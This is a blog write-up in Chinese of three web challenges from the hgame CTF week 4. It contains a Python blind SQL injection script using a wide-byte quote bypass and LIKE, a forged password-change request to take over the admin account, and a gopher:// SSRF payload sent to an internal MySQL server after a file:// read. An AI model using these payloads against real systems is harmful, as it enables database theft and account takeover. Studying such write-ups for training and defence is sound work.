Sky's blog

hgame-week4-web

Word count: 1,092 / Reading time: 6 min
2018/02/25 Share

又双叒叕是SQLI

发现文件泄露index.php~

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php
error_reporting(0);
include("sql.php");
$waf="/(union|group by|=|>|<|hex| |lower|strcmp|updatexml|xmlelement|extractvalue|concat|bin|sleep|mid\(|substr|left|ascii|\/\*|\*\/)/i";
if(isset($_GET['user'])){
if(preg_match_all($waf,$_GET['user'])!=0){
$user="admin";
}else{
$user = str_replace("'","\'",$_GET['user']);
}
//echo $user."<br>";

$sqli = new mysqli($host,$username,$passwd,$database);
$sqli->set_charset("gbk");
$query="select * from users where username='".$user."'";
$result = $sqli->query($query);
//echo $sqli->error;
$num=0;
@$num = $result->num_rows;
if($num>0){
while($row = $result->fetch_row()){
echo $row[0]."&nbsp;&nbsp;&nbsp;&nbsp;".$row[1]."&nbsp;&nbsp;&nbsp;".$row[2]."<br>";
}
}
}

还是比较容易的,可以发现like还在,所以我就直接写脚本了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import requests
import string
url = "http://118.25.18.223:10088/?user="
flag = ""
true_flag = ""
for i in range(1,1000):
payload = flag
for j in "0123456789"+string.letters+"!@#$^&*(){}=+`~_":
#my = "%%df%%27%%0aor%%0a((select%%0adatabase())%%0alike%%0a0x%s25)%%23"%(payload+hex(ord(j))[2:])
#my = "%%df%%27%%0aor%%0a((select%%0aTABLE_NAME%%0afrom%%0ainformation_schema.TABLES%%0awhere%%0aTABLE_SCHEMA%%0alike%%0adatabase()limit%%0a0,1)%%0alike%%0a0x%s25)%%23"%(payload+hex(ord(j))[2:]) #flllllag
#my = "%%df%%27%%0aor%%0a((select%%0aCOLUMN_NAME%%0afrom%%0ainformation_schema.COLUMNS%%0awhere%%0aTABLE_NAME%%0alike%%0a0x666c6c6c6c6c6167%%0alimit%%0a2,1)%%0alike%%0a0x%s25)%%23"%(payload+hex(ord(j))[2:]) #notflag thisisflag
my = "%%df%%27%%0aor%%0a((select%%0athisisflag%%0afrom%%0aflllllag)%%0alike%%0a0x%s25)%%23"%(payload+hex(ord(j))[2:]) #notflag thisisflag
url1 = url+my
r =requests.get(url=url1)
if '998' in r.content:
flag += hex(ord(j))[2:]
true_flag += j
print true_flag
break

得到flag:

1
hgame{like!injection!so!g00d##}

散落的flag

一个js的题,大多数是未验证导致的问题,一共3个步骤
1.随便注册一个账号,登录成功给flag的1/3
2.伪装admin去get_userinfo(),给flag的1/3
3.修改admin密码登录,给flag的1/3
首先注意一下用户名和密码的格式

1
2
username = /^[a-zA-Z0-9]{5,}$/i;
password = /^[a-zA-Z0-9]{6,}$/i;

所以用户名5位以上,密码6位以上就行了,这个正则还是比较容易看懂的,不细说了
然后开始解题
1.注册账号
这里要手机验证码,也是很容易的,看1.js

1
2
3
4
5
6
7
8
9
10
function get_check(){
var phone_num = $("#phone").val();
var st = /^[\d]{11}$/i;
if(st.test(phone_num)){
$.post('get_phone_num.php',{phone:phone_num},function(data) {
if(data!="error"){
$("#check").val(data);
}
})
}

我们直接在控制台调用即可获得验证码
然后注册成功

1
2
3
4
5
6
7
User Info

skycool

username: skycool

secret: hgame{0102940de1

2.更改密码
典型的未认证,抓包修改即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /change_pwd.php HTTP/1.1
Host: 118.25.18.223:10099
Content-Length: 31
Cache-Control: max-age=0
Origin: http://118.25.18.223:10099
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://118.25.18.223:10099/change_pwd.php
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=8cd13b83ef7b312e687c59c83e146907
Connection: close

username=admin&password=skycool

然后去登录admin用户

1
2
congratulation you get The last flag:
|98924acfce}|(竖线内的内容为最后一段flag)

3.直接调用get_userinfo()
我们看到http://118.25.18.223:10099/js/2.js

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
function get_userinfo(){
var user = $("#user").text();
$.ajax({
url: "check_user.php",
type: "POST",
data:{username:user},
dataType: "json",
error: function(){
$("#username").html('Error loading XML document');
},
success: function(data,status){
$("#username").html("username: "+data[0]);
$("#secret").html("secret: "+data[1]);
}
});
}

$(document).ready(get_userinfo());

直接调用即可,我们将user更改为admin
可以得到

1
["admin","10c546b2cf68"]

于是flag完整了:hgame{0102940de110c546b2cf6898924acfce}

奇怪的SQLi

有文件泄露:/.git/
随手注册

1
2
admin%df'
admin

然后登陆成功,看到是curl
随手读

1
file:///etc/hosts

得到

1
127.0.0.1	localhost ::1	localhost ip6-localhost ip6-loopback fe00::0	ip6-localnet ff00::0	ip6-mcastprefix ff02::1	ip6-allnodes ff02::2	ip6-allrouters 172.17.0.2	mysql 77f62039fede 172.17.0.5 b6e0e267e603

发现是mysql,然后在.git恢复中发现被删除的config.php
得到用户名week4,数据库名users,无密码
发现是典型的gopher打mysql
给出参考链接

1
https://www.baidu.com/link?url=jC4dzIidPqY9lJSvUyNy2w8oFO63_llwUj1hnkGhNe_r1UVF7ZIyqUV457cSWT6ymMoU3a6i_ST9c2S02F_vkK&wd=&eqid=d2070bde00003288000000035a9502d1

就不细说了,最近也比较火,分析原理帖子很多,这里直接给出payload:

1
gopher://172.17.0.2:3306/A%2C%00%00%01O%B7%00%00%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00week4%00%00flag%00%60%01%00%00%03select%20concat%28cast%280x504b03040a00000000000000000000000000e8030000e803000010000000746869735f69735f7468655f666c6167%20as%20binary%29%2C%20rpad%28%28select%20hgame%20from%20galf%20where%20id%3D1%29%2C%201000%2C%20%27-%27%29%2C%20cast%280x504b01021e030a00000000000000000000000000100000000000000000000000000000000000746869735f69735f7468655f666c6167504b0506000000000100010036000000640000000000%20as%20binary%29%29%00%00%00%00

可以得到flag:

1
hgame{Th1s_Flaggggggggggg}

CATALOG
  1. 1. 又双叒叕是SQLI
  2. 2. 散落的flag
  3. 3. 奇怪的SQLi